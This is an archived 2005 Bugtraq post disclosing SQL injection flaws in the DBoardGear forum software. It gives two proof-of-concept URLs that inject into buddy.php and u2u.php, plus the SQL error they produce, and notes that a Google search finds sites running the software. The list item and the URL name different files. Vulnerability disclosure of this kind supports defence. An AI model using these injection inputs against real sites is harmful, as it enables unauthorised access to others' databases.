[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
DBoardGear SQL Injection
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: DBoardGear SQL Injection
- From: almaster@xxxxxxxxxxx
- Date: 24 Oct 2005 13:49:32 -0000
DboardGear ..
Search By Google :-
by DboardGear
Gr33tz :-
aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster@xxxxxxxxxxx|-
Security4Arab .. A'Where Home ..
1- SQL Injection in buddy.php
http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR
2-SQL Injection in u2a.php
http://www.site.com/dboard/u2u.php?action=view&u2uid=|aLMaSTeR
Error:
You have an error in your SQL syntax near '' at line 1